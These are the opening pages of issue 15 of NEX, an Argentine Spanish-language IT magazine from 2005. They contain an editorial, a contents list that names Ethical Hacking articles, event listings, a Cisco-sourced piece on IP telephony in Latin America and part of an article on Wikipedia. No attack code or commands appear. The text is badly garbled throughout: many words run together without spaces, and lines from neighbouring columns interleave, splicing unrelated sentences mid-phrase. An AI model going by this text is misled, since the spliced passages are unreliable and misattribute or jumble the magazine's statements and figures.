Está en la página 1de 84

NOTA DEL EDITOR

¿Porquéestamoscontentosconeldesarrollo
delproyecto"NEXITSpecialist"(revista
STAFF deNetworkingyProgramación)?

Director Porsuimpacto,aceptaciónyrepercusión.
- Dr. Carlos Osvaldo Rodriguez.
Esaespartedelarespuesta.Peroquizáslarazónquemás
Propietarios se aproxime, sea porque estamos logrando cumplir nues-
-COR Technologies S.R.L.
tros objetivos propuestos en NEX # 1 (cuando nacimos y
Coordinador Editorial éramos periódico de distribución gratuita): Educar. En
- Carlos Rodríguez Bontempi. muchas oportunidades hemos pensado a NEX como un
"libroencuotas".
Responsable de Contenidos
- Dr. Carlos Osvaldo Rodríguez.
"NEXITSpecialist",
Editores brindaconocimientosentecnologíaIT.
- Carlos Vaughn O'Connor.
- Carlos Rodríguez.
Pero además, es un conocimiento muy especial. Uno que
prepara,capacitaygeneraunámbitodediscusión.Ysirve
Marketing y Publicidad enormementeaquienestáenlabúsquedadeempleoopre-
- Ulises Roman Mauro. umauro@nexweb.com.ar parándoseenunaUniversidadoCarreraTécnicaparasalir
enunfuturoalmercadolaboral.Porotrolado,actualizay
Distribución traetemasmuynuevosparatodosconinterésyqueestén
- Miguel Artaza.
activosenredesyprogramación.
Diseño Gráfico Decidimosdesdeuncomienzoabarcartodaslastecnologí-
- Esteban Báez. as y sus temas asociados: sistemas operativos bases de
- Carlos Rodríguez Bontempi. datos,programación,seguridad,genteehistoriaenIT,ca-
Preimpresión e Impresión pacitación, certificaciones internacionales. Sin importar
Impresión: IPESA Magallanes 1315. Cap. Fed. qué implementación: Linux-like, Windows, Java, .NET,
Tel 4303-2305/10 Mono,Oracle,SQLDB2,MySQL,Postgres...
Impresión de esta Edición 8.000 ejemplares En"NEXITSpecialist"ellectordeberíaencontrarlofunda-
mentaldecadatópicoyasítener"elpanoramatotal"(loque
Distribución sellamaeninglés"theBigPicture")demododedominar
Distribución en Capital Federal y Gran Buenos Aires:
Distribuidora SANABRIA. Baigorria 103. Cap. Fed. todosloselementoalmomentodetomarunadecisión(por
Distribuidora en Interior: Distribuidora Austral de ejemplolaboral,alorientarsusestudios,susdecisionesde
Publicaciones S.A. Isabel la Católica 1371 Capital compraoensudiariatareaenIT).
Federal. Dijimosenelprimernúmerolatrascendenciaquetienehoy
NEX-Revista de Networking y Programación laseguridadinformáticayasíimplementamoslosvolúme-
Registro de la propiedad Intelectual en trámite nesquetantarepercusiónhantenidodeEthicalHackingy
leg número 3038 ISSN 1668-5423 quecontinuaremosenpróximasediciones.
Dirección: Av. Córdoba 657 P 12
C1054AAF - Capital Federal
Estamostambiéncontentosporquésehansumadoalpro-
Tel: +54 (11) 4312-7694 yectocontribuyendoconnotastécnicas:Microsoft,CISCO,
Queda prohibida la reproducción no autorizada varios grupos Open Source, Snoop Consulting, Panda
total o parcial de los textos publicados, mapas, Software,newsletterNNL.
ilustraciones y gráficos incluídos en esta edición.
La Dirección de esta publicación no se hace re-
Novedad 1: desde este número incorporaremos artículos
sponsable de las opiniones en los artículos firma-
sobretendenciasdelmercadoITdemodoquequiendeba
dos, los mismos son responsabilidad de sus tomar decisiones tenga una evaluación completa de las
propios autores. Las notas publicadas en este varias tecnologías que van surgiendo e imponiéndose. En
medio no reemplazan la debida instrucción por este fascículo en particular es "VOIP" (VOice over IP) o
parte de personas idóneas. La editorial no asume mejordicho"ComunicacionesIP".
responsabilidad alguna por cualquier consecuen-
cia, derivada de la fabricación, funcionamiento
Novedad 2: una Nota de Opinión a cargo de Ricardo D.
y/o utilización de los servicios y productos que se Goldberger,productordelnewsletterelectrónicoT-Knos.
describen, analizan o publican.
Si desea escribir para nosotros, enviar un e-mail a:
articulos@nexweb.com.ar.
Foto: © 2005 Hemera Technologies Inc.

www.nexweb.com.ar
#15
Indicegeneraldecontenidos

6 - Eventos.
NOTASDESTACADAS
8 - Comunicaciones IP en Latinoamérica:
Justificaciones, Cifras y Realidades. ComunicacionesIP
12 - Wikipedia. enLatinoamérica:
14 - Richard Stallman. Justificaciones,
CifrasyRealidades.
16 - Innovadores del Software.
Conozca las tendencias de mercado de
20 - Microsoft ISA Server. VOIP (voz sobre IP) y sus "players" más
importantes (actuales y nuevos).
25 - MPI: Programación en Paralelo.

30 - ¿Qué es un Firewall?. INNOVADORES


DELSOFTWARE
34 - Windows Firewall.
Bases de datos, sistemas operativos, in-
42 - IPtables. terfases gráficas: ¿quienes fueron los in-
novadores en el mundo del software?
44 - LAMP no significa lámpara en inglés.

46 - SQUID. FIREWALLS
¿Qué es un Firewall? ¿Qué ofrece Linux y
52 - X Windows. Windows?.Todo esto en tres artículos.
57 - Opinión: Ricardo D. Goldberger.
ISASERVERYSQUID
59 - Ethical Hacking Vol. 3
Dos artículos que nos introducen al mundo
de Proxy-servers.

LAMP
Linux, Apache, MySQL y PHP. En este artículo
le explicamos su trascendencia y como
Ilustración de portada por Marcos Severi.

O´Reilly creó onlamp.com.

X-WINDOWS
No podemos no conocer esta tecnología que
nos permite manejar la capacidad gráfica del
mundo *UNIX.

|4 - NEX / Revista de Networking y Programación


INDICE

ETHICAL
HACKING
VoL.3
Artículos de seguridad informática: Sniffers, Pharming,
Hacking Unix, Comunicaciones Seguras. No deje además de
leer el interesante artículo de Carlos Tori (editor del newslet-
ter nnl de seguridad informática) (www.nnlnews.com))
sobre Habeas Data y el acceso público a datos sensibles y sus
posibles consecuencias

59 En el próximo...

60 Sniffers #16
WEB SERVER:

62 Pharming APACHE, IIS 6.0,


COLDFUSION, ASP,
PHP, SEGURIDAD
CasoNIC.ar
64 WEB SERVER HACKING:

Buffer Overflows,
ComunicacionesSeguras SQL injections…
68 BASES DE DATOS:

76 HackingUnixPaso7
Oracle, SQL DB2,
MySQL, Postgres...

PARADIGMA
78 Netcat,lanavajasuiza DE PROGRAMACION:

Java, .NET, Mono

Revista de Networking y Programación / NEX - 5|


EVENTOS

INNOVA05 COSENTIC05
CongresodeSeguridaden
21 de Abril 2005
UTN Buenos Aires TecnologíadeInformacióny
Jornada ideada para que las empresas mues- Comunicación
tren sus nuevos proyectos y avances tecnoló-
gicos a la comunidad Universitaria. 7 y 8 de Junio 2005
Informes Sheraton Libertador
4803-6100 mgparra@worktec.com.ar Tiene el objeto de profundizar y educar sobre
la necesidad y problemática de la seguridad
de la información a directivos de sistemas y
MOVIL2005
administración y finanzas, ejecutivos y consul-
tores.
25 y 26 de Abril de 2005
Informes
Sheraton Hotel Buenos Aires.
4803-6100 mgparra@worktec.com.ar
Dos días de conferencias con oradores líderes
del mercado que analizarán el nuevo escenario
de acción y el futuro del negocio Internet–3ºJornadasde
Informes ReflexiónyNegociosen
4345-3036 eventomovil@convergencia.com.ar Internet
RedesdeGobierno2004 24 de Junio 2005
Marriot Plaza Hotel
19 y 20 de Mayo 2005 Informes
Predio Ferial de Buenos Aires 4345-3036 eventos@convergencia.com.ar
Informes
4345-3036 eventos@convergencia.com.ar TelefoníaIP
LaconvergenciaTotal
EXPOMATICA2005
24 y 25 de Agosto de 2005
19 al 22 de Mayo de 2005 Sheraton Hotel – Buenos Aires
Sheraton Hotel Córdoba, Av. Duarte Quirós Oportunidad de capacitación y actualización
1300. junto a los líderes del sector. La audiencia más
El Objetivo de la exposición es allegar a las calificada. 2004: 470 asistentes. 19 sponsors.
marcas y mayoristas al canal del Interior del 12 workshops.
país, conseguir contactar directamente los pro- Informes
veedores de IT con las empresas 4345-3036 eventos@convergencia.com.ar
Informes
0351-4723053 expomatica@jointgroup.com.ar
www.expomatica.com.ar TECNOAR2005-2°
EXPOSICIÓNNACIONAL
Segundo Congreso Nacional
DEINFORMÁTICAY
deSoftwareLibre:USUARIA
TECNOLOGÍA
6 y 7 de Junio 2005
1, 2 y 3 de septiembre de 2005.
Buenos Aires Sheraton Hotel,
Patio de la Madera de la ciudad de Rosario
Su enfoque se dirige hacia cuatro grandes y
Informes
diversos planos (Estrategias, Soluciones
www.tecnoar.org.ar info@tecnoar.org.ar
Reales, Tecnología y Migraciones)
Informes
www.softlibre.org.ar EXPOCOMM2005
USUARIA: Rincón 326 (C1081ABH) - Capital
Federal 27 al 30 de septiembre de 2005
La Rural, predio ferial de Palermo
NETWORKERSSOLUTIONS Por 4to año consecutivo será el lugar para
conocer las soluciones de redes empresariales
FORUM2005
que pueden cambiar el ritmo de los negocios
de su empresa.
6 al 9 de Junio de 2005
Informes
Hotel Hilton de Buenos Aires, Argentina
www.expocomm.com.ar
Los temas: Telefonía IP, Seguridad y Manager
infoexpocomm@ejkreed.com
Services. Informes
www.cisco.com/ar/networkers/registration.html

|6 - NEX / Revista de Networking y Programación


Networkers Solutions Forum es el Panda Software ha lanzado 'Niños
evento en el que podrá desarrollar los conocimientos ne- en Internet: no permitas que hablen
cesarios para llevar exitosamente su empresa a través de con extraños', una campaña que tiene como ob-
la dinámica Economía Global de Internet. Es la conferen- jetivo concienciar a los padres de los riesgos que corren
cia más importante de usuarios para profesionales en sus hijos cuando navegan por la Red sin supervisión.
redes, y su oportunidad para obtener el entrenamiento y La iniciativa cuenta con el apoyo de la ONG Save the
Children.
la información necesaria para estar actualizado acerca de
tecnologías, soluciones y productos Cisco. “Actualmente”, declara Raquel González Juárez, responsa-
ble del Programa de Tecnologías de la Información y la
Durante los dos días de Networkers Solutions Forum, Comunicación, de Save the Children,“el papel que juega
la televisión en la formación de los menores es motivo de
usted podrá:
debate. “Sin embargo”, recalca, “la existencia de una
- Elegir entre más de 25 sesiones de entrenamiento es- brecha tecnológica generacional entre padres e hijos
pecializadas. provoca que la mayor parte de los padres desconozcan
- Como actividad adicional a desarrollarse el día 6 de junio, Internet, por lo que su control les es más complicado”.
podrá inscribirse a los Techtorials (Power Sessions), cursos
El site de la campaña “Niños en Internet: no permitas que
técnicos intensivos de un día completo de duración. hablen con extraños”ofrece a los padres o tutores todo lo
- Impulsar su carrera con Exámenes de Certificación Cisco. que necesitan, estructurado en los siguientes apartados:
- Visitar las Clínicas de Diseño, donde podrá discutir so- Datos nada inocentes, con datos aportados por Save
luciones específicas a sus problemas de redes con ex- the Children sobre los hábitos de navegación de los
pertos certificados de Cisco. menores.
- Descubrir soluciones que podrá implementar en la red de ¿Qué acecha a tus hijos?, que permite conocer las a-
su empresa para incrementar el éxito en sus negocios. menazas de Internet, como contenidos de carácter deni-
- Aprender de implementaciones exitosas para maximi- grante, racista, sexual, violento, etc., no aptos para
zar la operación de su red. menores, 'malware', etc.
- Llevar a cabo reuniones Uno-a-Uno con ingenieros y Apártales del peligro, con algunas sugerencias sobre
desarrolladores de Cisco. cómo informarse de la política de privacidad de su prove-
- Escuchar a los altos ejecutivos de Cisco presentar su edor de Servicios de Internet, establecer con sus hijos
visión del futuro en las Conferencias Plenarias. reglas firmes sobre el uso de Internet e instalar un buen
- Visitar el Technology Showcases, donde los Partners de programa antivirus.
Cisco demostrarán sus productos, servicios y soluciones. Un aliado en tu PC, apartado en el que Panda Software
- Relacionarse con otros profesionales de la industria en ofrece gratuitamente a los padres y tutores Panda Platinum
las diferentes sesiones, en el Technology Showcase y en Internet Security 2005, con tres meses de servicios.
los eventos especiales. Sigue informándote, sección de links relacionados con
el tema.

http://www.cisco.com/cr/networkers http://www.menorenlared.org/

Revista de Networking y Programación / NEX - 7|


TENDENCIAS DE MERCADO

COMUNICACIONES IP

ENLATINOAMÉRICA:

JUSTIFICACIONES,

CIFRASYREALIDADES.
Elartículoquesiguenosda Empresas de todos los tamaños y sectores e- redes simultáneas, con todos los costos que
aconocerlastendenciasdel conómicos en Latinoamérica, están cambiando esto genera en materia de administración,
sus sistemas tradicionales de Telefonía, más mantenimiento y operación, si es posible
mercadodeTelefoníaIP,o conocidos como PBX, por soluciones de comu- contar con una única red tanto para los datos
mejorexpresado:COMUNI- nicaciones basadas en IP (Internet Protocol, como para la voz?
CACIONESIP.Lanotaestá Protocolo de Internet)). De esta manera, las Comunicaciones IP son
fundamentalmentebasadaen Esta tendencia, ampliamente diagnosticada y mucho más que el uso de las redes in-
unestudiohechoporCISCO respaldada por las principales firmas de inves- teligentes de datos y del Protocolo de Internet
tigación de mercados, por consultores y analis- (IP) para manejar las llamadas telefónicas. Las
(verhttp://www.ciscoredac- tas independientes y, en especial, por los comunicaciones IP son atractivas para las em-
cionvirtual.com)Esintere- mismos clientes que toman la decisión de dejar presas por varias razones y motivos, además
santeobser varcomoenel de lado sus viejos sistemas telefónicos, tiene su de añadir funcionalidades y aplicaciones que
artículoserepitelafrase justificación y razón de ser en las bondades y van mucho más allá de las que ofrece la tele-
“convergenciaderedes”. ventajas que ofrece la convergencia de redes. fonía tradicional.
La convergencia de redes, que se inició hace En primer lugar, las empresas pueden ahorrar
Tambiénconozcamosalos pocos años de manera tímida y aislada y que dinero en equipo, instalación y mantenimien-
nuevosplayerscomo crece de manera acelerada, no es más que la u- to, al contar con una única red tanto para las
Microsoft. nificación de la red de voz y la red de datos en computadoras como para los teléfonos, en
una única red de comunicaciones IP.Y es que la lugar de tener redes especializadas para cada
ecuación tiene mucho sentido. ¿Para que tener uno de ellos. En segundo lugar, las
Comunicaciones IP pueden reducir los costos
de llamadas telefónicas, debido a que las lla-
madas que viajan por la red pública pueden
viajar por la red corporativa y aún por
Internet. Y en tercer lugar, las Comunicaciones
IP aumentan la productividad y la flexibilidad
de las organizaciones y de los empleados.
Las soluciones de Comunicaciones IP son
ideales para empresas de cualquier tamaño
que deseen aprovechar al máximo sus in-
fraestructuras de comunicaciones, tanto si la
empresa se dispone a instalar un sistema tele-
fónico nuevo, finaliza el contrato de arren-
damiento de un sistema de distribución de
central privada (PBX) o un sistema de correo de
voz tradicional,o bien desea ampliar las capaci-
dades de una PBX existente.

4.000.000 TELÉFONOS IP -
100.000 EN LATINOAMERICA
*A Enero 2005

|8 - NEX / Revista de Networking y Programación


Marzo 2005 Nuevo player
ingresa al negocio de la
telefonía IP: Microsoft.
En una conferencia internacional que
conectó a 1000 personas en simultáneo
entre Los Ángeles y Londres, Bill Gates
adelantó la nueva visión de Microsoft
sobre la integración de las comunica-
ciones. En la presentación, que marca un
giro importante de la compañía hacia las
Para darnos una idea de órdenes de magnitud dad de diversas maneras. comunicaciones IP, el ejecutivo mostró un
de este mercado ejemplificamos con algunos Por ejemplo, cuando los empleados deben nuevo paquete de soluciones de oficina
números provistos por CISCO. cambiar su puesto de trabajo a otro escritorio que aprovechan las ventajas de trabajar en
A la fecha (Enero 2005), Cisco ha despachado que puede estar en la misma oficina o en otra tiempo real. Durante el evento, invitados
100.000 teléfonos IP en América Latina. Cisco oficina en cualquier lugar del mundo, solo del programa de NBC', "The Apprentice",
despachó estos 100.000 teléfonos en los deben identificarse (usuario y PIN) en el telé- hicieron uso de los nuevos desarrollos en
últimos 18 meses, a un promedio de 4 telé- fono IP de destino y automáticamente tendrán vivo y en directo, para demostrar las vir-
fonos IP por hora. el número de extensión, memorias y privilegios tudes y beneficios que ofrece el trabajo en
A nivel mundial, Cisco ha despachado 4.000.000 que tenían en su lugar original. tiempo real y cómo ayuda en la acelera-
de teléfonos IP. En Agosto de 2002 Cisco Nada de esto requiere de asistencia por parte ción de los negocios.
despachó su primer millón de teléfonos IP, un del departamento de telecomunicaciones o de
logro que tomó a la compañía tres años y TI de la compañía, por lo que la telefonía IP es cliente o, incluso, realizar el pedido.
medios. Un año después, en julio de 2003, Cisco un elemento que le ahorra tiempo tanto a Mensajería Unificada: Una de las aplicaciones
alcanzó la marca de los dos millones de telé- ambos departamentos como al empleado. más atractivas es la mensajería unificada, que
fonos. Solo ocho meses después, en abril de Entre las organizaciones que utilizan Telefonía integra diversas tecnologías para que los
2004, los despachados de Cisco pasaron de dos IP, un 72% reporta que los integrantes de la usuarios puedan tener acceso al correo de voz,
a tres millones de teléfonos IP,despachando más planta de personal de tecnología de la infor- fax y correo electrónico, utilizando la her-
de 8,000 teléfonos IP por cada día laboral. mación se beneficiarán de su capacidad de re- ramienta más conveniente en el momento:
alizar traslados, adiciones y cambios más computadora portátil, computadora de escrito-
¿QUɝBENEFICIOS rápidos y un 71% afirma que los usuarios rio, teléfono fijo, teléfono inalámbrico o PDA in-
APORTAUNARED? finales se beneficiaran de la Telefonía IP, según alámbrico. En razón de que todas estas formas
una encuesta realizada por Sage Research. de comunicación se encuentran manejadas por
Lograr un crecimiento sostenido en la produc- Más aún, la telefonía IP puede ayudarle a los una única aplicación, los usuarios solamente
tividad de las organizaciones no radica en empleados a ahorrar tiempo en otras formas tienen que utilizar este servicio para poder
lograr que los empleados trabajen mas duro.Se también. Los teléfonos IP en general sopor- tener acceso a su mensajería unificada.
trata de lograr que trabajen más inteligente- tan el lenguaje XML (extensible markup lan- Movilidad: Las redes inalámbricas le proporcio-
mente. Es aquí donde están los verdaderos au- guage), el cual permite desarrollar aplica- nan a los empleados acceso de alta Velocidad a
mentos en productividad." ciones de valor agregado orientadas a distin- la red empresarial y a Internet a través de
Una infraestructura de red basada en IP puede tos mercados verticales. ondas de radio en lugar de las conexiones ca-
entregar un basamento sobre el cual se En la industria de ventas al detalle, por bleadas tradicionales. Los empleados utilizan
pueden operar aplicaciones que les permitan a ejemplo, una aplicación XML, sobre un telé- una tarjeta de red inalámbrica o un chip en sus
los empelados trabajar en forma más in- fono IP puede permitirles a los vendedores en computadoras portátiles para conectarse a un
teligente. Las aplicaciones de Comunicaciones una tienda verificar rápidamente las existen- punto de acceso inalámbrico en la LAN.
IP, incluyen telefonía IP, mensajería unificada, cias en el inventario de otras tiendas en la La movilidad que proviene de las redes inalám-
aplicaciones inalámbricas, aplicaciones para cadena. Al oprimir unas pocas teclas, el bricas y de otras tecnologías proporciona un
centros de contacto, video y aplicaciones, XML, vendedor puede reservar el artículo para el aumento casi instantáneo en la productividad,
entre otras.
En esta era del conocimiento, los empleados
pueden utilizar la red y las tecnologías basadas
en IP para colaborar más eficientemente y para
comunicarse con mayor facilidad. Esta in-
fraestructura también les permite transportar
datos, voz y video a través de la red en forma
mas inteligente, por lo que pueden tomar deci-
siones mas rápido, lo cual, a su vez, aumenta la
agilidad de la empresa, factores todos claves
para aumentar la productividad.
Las comunicaciones IP mejoran la productivi-

Revista de Networking y Programación / NEX - 9|


voz entre farmaceutas que se encuentra mez-
clando recetas de fármacos compuestos.
Cualquiera que tenga conocimientos básicos
de desarrollos en la Web y de las herramientas
apropiadas, puede crear servicios telefónicos

TENDENCIACRECIENTE

El auge y madurez de los sistemas de


Telefonía IP se refleja tanto en la cantidad de
equipos despachados (oferta) como en la de-
cisión de los clientes de migrar a la nueva tec-
nología (demandada), convirtiéndose en una
tendencia irreversible.
según una encuesta a mas de 300 empresas re- En general, los analistas de mercado utilizan
SEGURIDAD DE VOZ SOBRE IP alizada por NOP World Technology. Según el dos grandes categorías para medir el mercado
informe, los empleados que utilizan una red in- de Telefonía IP, que a su vez hace parte del
En mayo 2004 Miercom alámbrica permanecen conectados a las redes mercado de telefonía total: las soluciones IP
(ttp://www.miercom.com/) realizó un test corporativas un promedio de 1,75 horas más puras o Telefonía LAN, y las soluciones IP
de seguridad con varios participante del por día, lo que les ayuda a los usuarios prome- "Enabled".IP Habilitadas o Híbridas le permiten
mercado VOIP. Los sistemas de telefonía IP dio a aumentar su productividad hasta en un a los sistemas de telefonía tradicional obtener
estuvieron sometidos a tres días duros de 22%. Las redes inalámbricas son apenas el ciertas características de telefonía IP a través
pruebas realizadas por hackers sofisticados comienzo. Existe una amplia gama de solu- de hardware y/o software que se incorpora a la
buscando vulnerabilidades de seguridad. ciones de movilidad, incluso firewalls para la PBX. La solución de telefonía IP pura es una
El Objetivo de los ataques era interrum- red y herramientas para la red privada virtual central telefónica 100% IP. Desde el call
pir las comunicaciones de los teléfonos (VPN) para prestarles apoyo a los trabajadores manager hasta los teléfonos son 100% IP y
IP. A través de cada uno de los puntos a distancia, a las oficinas remotas y a los traba- prestan todos los beneficios de la tecnología IP.
de asalto, los hackers usaron herramien- jadores móviles. Al utilizar estas soluciones, Si bien Comunicaciones IP se refiere a un
tas de exploración y técnicas para des- pueden lograr acceso a las mismas herramien- sistema de Telefonía IP Puro, cabe destacar que
cubrir lo que pudieran sobre la topología tas de productividad a las que tiene acceso en gracias a la integración posible con sistemas de
y después lanzaron numerosos ataques la sede principal de la compañía. telefonía tradicionales (PBX) y al cumplimiento
sofisticados de Negación del Servicio. de estándares de la industria, los mismos
En resumen, el resultado obtenido en las TELEFONÍAIP= podrían convertirse en "Enabled" o "Híbridos"
pruebas de Seguridad de Miercom más TELEFONÍAINTELIGENTE con mediante soluciones IP puras (tal es el caso
la capacidad de encripción de llamadas de Comunicaciones IP de CISCO) estando de
de teléfono a teléfono o de teléfono a Además de las características normales de un esa manera, mejor preparados para la evolu-
gateways de salida a redes de telefonía teléfono, los teléfonos IP pueden ser utilizados ción hacia el futuro.
tradicionales, posiciona a para ingresar y consultar datos, acceder a la Las ventajas en funcionalidad entre uno y otro
Comunicaciones IP como el sistema de contabilidad, entregar información y mucho sistema son muy grandes. Dentro del desarrollo
telefonía mas seguro del mercado. más. Al igual que una computadora PC, puede del mercado total de telefonía,la tecnología que
Voice over IP Security Alliance, un grupo ser configurado a la medida y en forma tal que tiene las mayores posibilidades de crecimiento
de la industria formado recientemente, ayude a resolver aquellos problemas específi- es IP-Puro. Según las cifras de Gartner Group del
instituyó un nuevo comité para definir cos de las empresas y contribuir a aumentar la 2004, la venta de líneas tradicionales (TDM)
los requisitos de seguridad de las redes productividad y generar ingresos. tenderá a cero en los próximos cinco años y la
de telefonía vía Internet. También habrá A diferencia de los aparatos telefónicos tradi- venta de líneas híbridas, aunque está pasando
otros comités relacionados con mejores cionales para oficina, los teléfonos utilizan XML por un buen momento en la actualidad, tenderá
prácticas y testeo. sobre HTTP para comunicarles con los servi- a decrecer ya que son simplemente un medio de
La alianza fue creada con el propósito dores de la Web, lo cual la permite la recu- llegar a la telefonía IP-Pura. Por último, la
generar conocimiento público y foco en peración de información y la generación de Telefonía IP pura es la única que se proyecta con
las mejores practicas de seguridad y pri- contenido. Al pegarse a cualquier servidor que crecimiento constante hacia el futuro y es la tec-
vacidad den las redes públicas de tele- sea compatible en la Web, un teléfono IP puede nología que va a tener la mayoría sino, la totali-
fonía sobre Internet. La alianza informó descargar la información almacenada allí, dad de los puertos en 4 a 8 años.
que la cantidad de miembros miembros como si se tratara de una PC. Es interesante anotar que el "boom" de tec-
del directorio ya alcanza 50, que incluyen Un servidor telefónico es básicamente una nología híbrida le está permitiendo a los ju-
a empresas como 3Com, Enterasys, aplicación, redactada en forma de guión que el gadores de telefonía tradicional lograr ingresos
Nortel, PricewaterhouseCoopers, teléfono IP ejecuta con el fin de adquirir y adicionales a los percibidos si el enfoque fuera
Samsung Telecommunications America, mostrar la información. La información que se en telefonía IP híbrida. El costo total de
Siemens, SonicWall, TippingPoint, accede puede ser tan sencilla como un pronós- propiedad, CTP, de un sistema de telefonía que
McAfee, MCI y Sprint. tico del tiempo o el menú de un restaurante, o cambia a híbrido y finalmente a IP puro es más
tan compleja como un sistema de respuesta de alto que el CTP de un sistema que cambie a IP

|10 - NEX / Revista de Networking y Programación


Puro sin pasar por el proceso de habilitarlo a IP Las figuras 1 y 2, nos muestran a los princi-
a través de una tarjeta. pales players con su participación de
mercado a nivel mundial y teléfonos
MERCADOMUNDIAL despachados , respectivamente.
DELATELEFONIA
Las figuras 3 y 4 da participación de
Desde el punto de vista de la demanda, es decir mercado de PBX IP puro y telefonos IP a nivel
de la decisión e intención de los clientes de Latinoameroica, respectivamente.
migrar a sistemas de Telefonía IP, el panorama
es similar. De acuerdo con los estudios mas re-
cientes, el 28% de las empresas de De acuerdo
con el estudio de IDC, la principal razón que
lleva a las empresas a migrar de sus soluciones
de voz tradicionales a Telefonía IP, es el ahorro
en costos (48% de los entrevistados), en la
medida en que las empresas de todos los
tamaños de la región tienen una presión fuerte
para reducir sus inversiones en capital en tele-
comunicaciones y sus gastos operativos. Por
esto la convergencia (integración de voz y
datos en una misma red) emerge como una ¿El fin de la telefonía Empiezan a chatear pero si lo desean
solución real para reducir costos y generar au- tradicional? pueden plantearse la posibilidad de hablar
mentos en productividad. en vez de escribir, ya que la comunicación
Entre el 37% de las empresas que planean im- En la reciente reunión en Mar del Plata (Abril será más veloz.Todo lo que hay que hacer
plementar Telefonía IP, el 46% planean hacerlo 2005) de la ICANN (Internet Corporation for es instalar el software adecuado y encender
en el 2004, el 28% en el 2005 y el 4% en el 2006 Assigned Names and Numbers,Organización el micrófono, sin necesidad de realizar una
o luego. Un 22% de los encuestados no sabe encargada de Asignar los Números y llamada telefónica. Si lo que desean es tra-
cuando implementara la solución. Nombre a Internet),Vinton Cerf uno de los bajar con una herramienta de colaboración,
creadores del protocolo TCP/IP hizo declara- también lo único que deben hacer es
QUIENESQUIENENEL ciones respecto del futuro de la telefonía IP. bajarse el software adecuado.Todas están
MERCADODETELEFONIAIP Estas fueron reproducidas ebn diferentes formas de comunicación podrán llevarse
medios. A la pregunta realizada por Infobae acabo por Internet. El concepto de llamada
Las cifras de participación de mercado que ¿Reemplazará la telefonía IP a la telefonía telefónica está cambiando. Cuando uno
trimestral, semestral o anualmente publican tradicional?, respondió:- levanta el tubo del teléfono para comuni-
las principales firmas de investigación de mer- "VOIP es simplemente una de las cosas que carse con alguien no sabe si esa persona
cados a nivel mundial (Gartner, Dell Oro, pueden hacerse sobre Internet; es otra está del otro lado. Con Internet, el concepto
Synergy) y a nivel latinoamericano (IDC), son manera de transportar sonido. La manera de comunicación es presencia. Entonces, po-
un importante indicador para los clientes en que uno se comunica por Internet es dríamos decir que VOIP será el fin de la tele-
finales, quienes requieren criterios independi- muy distinta a la manera en que uno habla fonía tradicional pero de ninguna manera
entes y de referencia sobre la aceptación de las por teléfono. Cuando uno trabaja con un será el fin de las comunicaciones verbales".
diferentes soluciones disponibles en el programa de mensajería instantánea, y Si desea conocer más sobre los comentarios
mercado, Y aunque los estudios son diferentes quiere hablar con alguien, sabe inmediata- de Cerf sobre este y otros temas, recomen-
unos de otros, muestran una panorámica mente que esa persona está del otro lado damos ver: www.canal-ar.com.ar (newslet-
general y de tendencia, de lo que esta sucedi- porque aparece un icono o signo que le ter del 7 de Abril 2005)
endo en el mercado. indica que esa personas está online.
GENTE E HISTORIA EN IT

WIKIPEDIA
Bajo el mensaje "imagina un mundo en el el conocimiento es poderosa", describe
que cada persona tiene acceso libre a la suma Jimmy Wales, fundador de Wikipedia.
del conocimiento humano" se presenta al Por otro lado, se están preparando diferentes
La Enciclopedia mundo el ambicioso proyecto de Wikipedia, distribuciones de Wikipedia en CD y DVD.
que al día de hoy se ha transformado en la Pronto estará disponible una versión en
más consultada de la red enciclopedia más consultada de Internet y en alemán distribuida por Directmedia
Por David Alejandro Yanover,Fundador y Director de la la más sólida comunidad, dado que son los Publishing, y se incluirá una versión bilingüe
revista digital de informática MasterMagazine, con propios usuarios de la WWW quienes contri- en francés e inglés como parte de una dis-
referencia en www.mastermagazine.info buyen al crecimiento de la información. tribución de Mandrakesoft Linux.
Actualmente, Wikipedia figura entre los diez Daniel Pink, columnista de la revista Wired,
primeros lugares de referencia en Alexa, explicó recientemente a Wikipedia como "la
entidad que mide el tráfico y la popularidad biblioteca auto-organizable auto-reparable
de los sitios de Internet. Ha llegado a la cifra e hiperadictiva del futuro". BBC Noticias la
de un millón de artículos, y está disponible llamó "una de las más confiables y útiles
en más 195 idiomas, entre los cuales fuentes de información disponibles en o
aparece el Klingon, de la exitosa serie Star fuera de línea," y Tim Berners-Lee, padre de
Trek. Por su parte, la versión en español, la Web, la identificado como "la fuente de
creada en mayo de 2001, reúne cerca de 45 todo el conocimiento".
mil notas informativas, número que crece a Pero Wikipedia no se convirtió en la principal
más del 12% cada mes. Mientras que la enciclopedia de Internet de la noche a la
entrega digital en inglés supera las 500 mil. mañana, sino que fue un proceso que llevó
Es sumando los artículos disponibles en unos cuatro años en consolidarse. En enero
cada idioma como llega al millón de in- de 2001 nacía Wikipedia, fundada por la
formes a fines del 2004. Son agregados empresa Bomis de Estados Unidos, y con ello,
cerca de 2.500 por día. "La idea de compartir un sistema propio de publicación y control

Wikibúsqueda

|12 - NEX / Revista de Networking y Programación


del contenido denominado wiki,sobre el cual mucha incertidumbre giraba en torno a umentación libre GNU, lo cual permite a los
se basa el objetivo del proyecto.Wiki,que sig- Wikipedia en sus inicios, principalmente por usuarios copiar y modificar el trabajo de los
nifica rápido en hawaiano, comprende el el vandalismo que recorre la red y por los otros basado en un principio conocido como
modo en el que trabaja la enciclopedia. Así, gastos que el emprendimiento implica. copyleft. Es así, que muchos sitios y publica-
se distinguen tres tipos de miembros, de tal Es así, que no todas las informaciones añadi- ciones impresas reproducen frecuentemente
manera de evitar un único poder sobre el das a la enciclopedia son buenas noticias, ya contenidos expuestos en Wikipedia.
contenido que puede encontrarse en que es común que personas con malas inten- Muchas veces los temas de actualidad son cu-
Wikipedia. En el primer escalón están los ciones publiquen contenido falso. Sin biertos en Wikipedia con más detalle y veloci-
wikipedistas, aquellos que aportan nuevos embargo, es tan fuerte la comunidad, que dad que en otros medios, pero a la vez puede
contenidos o editan los ya existentes. dichas acciones tienen poca duración. Los ocurrir que ciertas informaciones no puedan
En Wikipedia, todo el mundo puede editar errores son encontrados por miembros de ser encontradas, y es que el contenido de la
cualquier artículo. Sin embargo, algunas ac- Wikipedia,y estos los remedian rápidamente. enciclopedia está basado en las preferencias y
ciones y tareas de mantenimiento están El sistema wiki es la clave de esta modalidad conocimientos de la comunidad.
reservadas para una clase especial de usuar- de trabajo en equipo. Uno encuentra un Con un sistema rápido, y de gran difusión, los
ios, los bibliotecarios. Con un nivel adminis- enlace de edición en cada artículo, o bien participantes se ven inmersos en una fantás-
trativo, los bibliotecarios tienen la capacidad varias posibilidades para crear nuevos artícu- tica comunidad, en la cual quedan impresas
